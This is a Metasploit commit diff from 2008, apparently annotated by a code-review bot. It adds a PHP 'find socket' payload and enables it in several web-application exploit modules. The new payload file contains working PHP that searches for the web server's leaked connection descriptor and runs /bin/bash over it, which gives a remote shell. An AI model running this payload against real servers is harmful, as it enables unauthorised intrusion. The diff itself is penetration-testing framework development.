initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs.

git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2008-09-24 04:41:51 +00:00
parent ddc47955f2
commit 36a06e7576
12 changed files with 147 additions and 10 deletions


@ -36,6 +36,10 @@ class CommandShell
"Command shell"
end
def run_cmd(cmd)
write_shell(cmd)
return rstream.get
end
#
# Calls the class method.
#
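Review bot: `run_cmd` is added without the `#`-block comment that its neighbours in this hunk carry (`# Calls the class method.`, `# Read from the command shell.`); add `# Writes cmd to the shell and returns whatever rstream.get reads back.` above `def run_cmd(cmd)`. The trailing `return` is also unnecessary in Ruby; `rstream.get` as the last expression yields the same value. Whether `rstream.get` returns the complete output of cmd or only what happens to be buffered is not visible from this hunk, so the comment should say which once that is confirmed.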
@ -54,7 +58,12 @@ class CommandShell
# Read from the command shell.
#
def read_shell(length = nil)
return rstream.read(length)
if length.nil?
rv = rstream.get
else
rv = rstream.read(length)
end
return rv
end
#
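Review bot: The `rv` temporary and the trailing `return rv` add nothing; the body of `read_shell` reduces to `length.nil? ? rstream.get : rstream.read(length)`. The branch does fix a real problem, because the old `rstream.read(length)` passed the nil default straight through to `Stream#read`, which this commit elsewhere only marks `# XXX handle length being nil`; that dependency deserves a one-line comment here, e.g. `# A nil length falls back to get, since Stream#read needs an Integer length.`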


@ -110,13 +110,15 @@ module Exploit::Remote::HttpClient
)
# If this connection is global, persist it
if (opts['global'])
# No reason for the socket not to be global and it allows findsock to
# work.
#if (opts['global'])
if (self.client)
disconnect
end
self.client = nclient
end
#end
return nclient
end
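Review bot: The `#if (opts['global'])` and `#end` lines are dead code left in place rather than removed, and with the conditional gone `self.client` is replaced on every connect, so `opts['global']` no longer has any effect — yet the PHP_INCLUDE hunk later in this commit still passes `'global' => true` and its new comment says that key is what enables find-shell compatibility. Either keep the option meaningful with a changed default, `if (opts.fetch('global', true))`, so a module can still opt out, or drop the `'global'` key and that comment in PHP_INCLUDE so the two files do not contradict each other. A module that deliberately opened a second, non-global connection now has its existing `client` disconnected from under it, which is the kind of regression the commit message warns about. The enclosing method starts outside the hunk.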


@ -123,6 +123,8 @@ protected
Rex::ThreadSafe.sleep(1.5)
end
# Make sure the read buffer is empty before we test for a shell
sock.get_once(-1,1)
# Check to see if the shell exists
sock.put("\necho #{ebuf}\n")


@ -24,7 +24,8 @@ class Msf::Module::Author
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'aushack.com',
'ramon' => 'ramon' + 0x40.chr + 'risesecurity.org',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org'
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com'
}
#


@ -95,7 +95,14 @@ protected
# Check to see if the user wants to abort.
#
def _interrupt
user_want_abort?
begin
user_want_abort?
rescue Interrupt
# The user hit ctrl-c while we were handling a ctrl-c, send a
# literal ctrl-c to the shell. XXX Doesn't actually work.
#$stdout.puts("\n[*] interrupted interrupt, sending literal ctrl-c\n")
#$stdout.puts(run_cmd("\x03"))
end
end
#
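Review bot: The `rescue Interrupt` arm contains only comments, so a second ctrl-c during the abort prompt makes `_interrupt` return nil instead of `user_want_abort?`'s answer, and the user gets no feedback at all; the comment itself records that the intended literal-ctrl-c path does not work. Make the fallback explicit rather than an accident of an empty rescue body — end the arm with `false` (or `true`, whichever the callers of `_interrupt` should see; they are outside the hunk) and a `$stdout.puts("\n[*] Interrupted while prompting")` so the swallowed signal is at least visible. The `XXX` would be more useful if it said what was observed to fail rather than just that it does.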


@ -54,6 +54,7 @@ module Stream
# This method reads data of the supplied length from the stream.
#
def read(length = nil, opts = {})
# XXX handle length being nil
begin
fd.sysread(length)
rescue IOError
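Review bot: The new `# XXX handle length being nil` comment documents a defect instead of fixing it: `length` defaults to nil and is passed straight to `fd.sysread(length)`, which on MRI raises a TypeError that the `rescue IOError` below does not catch. Until a real default is chosen, fail at the boundary with `raise ArgumentError, 'length must be given' if length.nil?` as the first line of the method, so callers see the misuse rather than a coercion error from deep inside the stream. `read` continues past the end of the hunk.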


@ -315,7 +315,7 @@ class Client
resp.max_data = config['read_max_data']
# Tell the remote side if we aren't pipelining
conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
#conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
# Wait at most t seconds for the full response to be read in. We only
# do this if t was specified as a negative value indicating an infinite
@ -369,15 +369,17 @@ class Client
end
rescue EOFError
return nil
rescue ::TimeoutError, ::Timeout::Error
#$stdout.puts("timeout\n")
end
} if (t)
# Close our side if we aren't pipelining
close if (!pipelining?)
#close if (!pipelining?)
# if the server said stop pipelining, we listen...
if resp['Connection'] == 'close'
close
#close
end
# XXX - How should we handle this?
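Review bot: Commenting out the `shutdown` and both `close` calls changes behaviour for every HTTP module, not just the find-shell payload: a server that answers `Connection: close` now has its socket kept and reused, so the next request on the same `Client` presumably hits the `rescue EOFError; return nil` path above instead of getting a fresh connection (unless `send_request` reconnects on its own, which is outside the hunk). Gate this on a client attribute instead of deleting it — e.g. `close if (!pipelining? && !persistent)` at the three sites, with `persistent` a new accessor that only the find-shell modules set — and remove the commented-out lines rather than leaving dead code. As written, the `if resp['Connection'] == 'close'` block is left with an empty body.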


@ -43,6 +43,10 @@ class Exploits::Unix::Webapp::Pajax_Execute < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 4000,
},
'Platform' => 'php',


@ -26,7 +26,7 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
'Description' => %q{
Exploits things like <?php include($_GET['path']); ?>
},
'Author' => [ 'hdm' , 'egypt <egypt@nmt.edu>'],
'Author' => [ 'hdm' , 'egypt' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@ -37,6 +37,13 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
# By adding {'global' => true} to the connect
# options we get find shell compatibility for free
# in php exploits.
'ConnectionType' => 'find',
},
'Space' => 32768,
},
'Platform' => 'php',
@ -57,8 +64,9 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
timeout = 0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))
print_status("Trying uri #{uri}")
response = send_request_raw({ 'uri' => uri },timeout)
response = send_request_raw({ 'global' => true, 'uri' => uri },timeout)
handler
end
end
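Review bot: `response` is assigned from `send_request_raw` but never read before `handler` runs, so the result of the request (and of the 0.01 second timeout) is silently discarded; either drop the assignment or inspect it, e.g. `print_status("No response within timeout") if response.nil?` before `handler`. The enclosing method begins outside the hunk.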


@ -42,6 +42,10 @@ class Exploits::Unix::Webapp::Wordpress_LastPost_Execution < Msf::Exploit::Remot
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 512,
},
'Platform' => 'php',


@ -45,6 +45,10 @@ class Exploits::Unix::Webapp::SPHPBlog_File_Upload < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 1024,
},
'Platform' => 'php',


@ -0,0 +1,93 @@
##
# $Id: bind_php.rb 5546 2008-07-01 01:44:56Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/core/handler/find_shell'
module Msf
module Payloads
module Singles
module Php
module ShellFindsock
include Msf::Payload::Single
include Msf::Payload::Php
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Command Shell, Find Port',
'Version' => '$Revision: 5546 $',
'Description' => %Q{
Spawn a shell on the established connection to
the webserver. Only tested on Apache but it
might work on other web servers that leak file
descriptors to child processes.
},
'Author' => [ 'egypt <egypt@metasploit.com>' ],
'License' => BSD_LICENSE,
'Platform' => 'php',
'Handler' => Msf::Handler::FindShell,
'Session' => Msf::Sessions::CommandShell,
'Arch' => ARCH_PHP
))
end
def php_findsock
#cmd = Rex::Text.encode_base64(datastore['CMD'])
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
shell = <<END_OF_PHP_CODE
error_reporting(E_ALL);
print("<html><body>");
flush();
error_log("Looking for file descriptor");
$fd = 13;
for ($i = 3; $i < 50; $i++) {
$foo = system("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
if ($foo != $i) {
$fd = $i - 1;
break;
}
}
error_log("Found it ($fd)");
print("</body></html>\n\n");
flush();
$c = "/bin/bash <&$fd >&$fd 2>&$fd";
system($c);
END_OF_PHP_CODE
#function mysystem(){
# #{php_preamble({:disabled_varname => dis})}
# #{php_system_block({:cmd_varname=>'$c', :disabled_varname => dis, :output_varname => '$out'})}
# return $out;
#}
return shell
end
#
# Constructs the payload
#
def generate
return php_findsock
end
end
end end end end
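Review bot: The header and metadata are copied from bind_php.rb and not updated: `# $Id: bind_php.rb 5546 ...` and `'Version' => '$Revision: 5546 $'` both name the other file, and `require 'msf/core/handler/bind_tcp'` is unused because `'Handler'` is `Msf::Handler::FindShell`. In `php_findsock`, `dis` is assigned but only referenced from the commented-out block after the heredoc, so it is dead code along with `#cmd = ...`; either finish that block or remove both. `php_findsock` also lacks the `#`-block comment that `generate` has; `# Builds the PHP source that generate returns.` above `def php_findsock` would match the file's style.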